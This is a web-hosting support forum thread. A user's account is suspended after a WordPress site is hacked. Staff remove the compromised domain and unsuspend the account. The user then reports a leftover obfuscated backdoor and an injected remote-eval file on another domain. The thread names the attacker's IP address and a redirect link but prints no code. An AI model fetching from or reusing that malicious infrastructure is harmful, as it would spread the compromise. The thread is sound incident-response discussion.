[Solved] Unsuspend account

[developer1]

Hello, i'm on the Morty plan and I got a mail from you yesterday that one of my sites that uses Wordpress was hacked and so my entire account has been suspended.

I would like to request that my account be unsuspended as i have many other sites on it which are not affected and which rely on being online.
I would appreciate it if the particular affected site is preferably brought down for maintenance but all my other sites which have been carefully curated and such are still left as they were.

I look forward to your speedy intervention. I would also like to ask in future if it's possible in such cases that the specific site be suspended instead of suspending an entire account.

Thanks.

 

[wolstech]

Our policy is typically to require the entire account be reset without a backup to destroy the contents before you can recover a hacked account (in case phishing or similar was set up and stolen information is present), though after looking through your account I don't see anything suspicious outside of the one domain that was compromised (lda.ng). 

Are you OK with deleting the contents of the domain lda.ng and the associated WP database to be unsuspended?

[developer1]

wow, please don't reset as i haven't performed a full backup. i am okay with clearing/deleting the contents of the lda domain etc. for it to be unsuspended. Once restored i will create a full backup of the entire account so that i can avoid any major losses going forward. 
I would appreciate it if you can Kindly pin point me to an article/guide on how to do a wholistic backup for the whole account so i can reduce my exposures.
Also any further information on how this attack was perpetuated/what exactly was affected, will go along way. Thanks!

[wolstech]

The contents of the domain lda.ng have been discarded, the associated WP database developer1_lda has been dropped, and you've been unsuspended. Your account may take up to 2 hours to function fully. The attack came in through Wordpress itself, which is usually either a result of plugins with vulnerabilities, or failure to install updates.

A backup from February actually does exist for your account at https://heliohost.org/backup/ if you need anything from that timeframe.

You can make backups using the backup tool in Plesk. Note that if you use this, it is advised that you configure remote storage, as the backups it creates count towards your disk space quota and can quickly cause you to run out of space.

[developer1]

Hi Wolstech,

Following up on this thread; wanted to flag something I found while cleaning up after the recent incident, in case it's useful for your records.

While reviewing my ngo.helioho.st site (a separate, non-WordPress domain on this account) I found two files that don't belong there: a heavily obfuscated backdoor named mac.php (last modified June 11, ~7:49 PM), and an injected index.php containing a remote-eval payload pulling from 63.141.235.34, plus a redirect to a suspicious shortened link, swiy.co/goodrich555 (modified June 13, ~7:07–7:12 AM). Both timestamps are before your review where you mentioned nothing looked suspicious outside lda.ng, so this looks like it's from the same intrusion window, just on a domain that isn't WordPress and may not have been part of that check.

Tried backuing up existing WP installs like ths.helioho, but i encounter Host Build interrupts sue to things like allowed runtime and PHP max execution.

I've already renamed both files to .infected to disable them and remove them from execution and I'm restoring a clean copy of that site myself. I'm not asking for another account-wide reset; this is contained and I'm handling it, but since I don't have shell access to search file contents across the rest of the account, Since this looks like leftover from the same incident rather than a new one, I wanted to flag it rather than sit on it. Would it be possible to do a targeted check for similar files on my other domains rather than a full account reset?-since the rest of the account otherwise appears unaffected. Happy to send over the exact file contents if that helps your scan.

Thanks again for the help.

[wolstech]

non-WordPress domain on this account)

That's why I missed it...that domain has node instead. When I went through the domains, I saw that one had node enabled and just skipped over it, as I was focused on the WP stuff. Good news is that those files, while definitely malicious, likely would not have been able to run anyway since you had Node enabled (passenger redirects everything to node when enabled on a domain, so Apache never gets to run the PHP files).

The interesting part is that the index.php is clearly meant for a nonexistent WP on that domain, and the mac.php looks like it may be the same or a very similar file to a file called bless24.php that was on the compromised lda.ng domain (I recognize this string from the top: xtamdxsirm from the other day).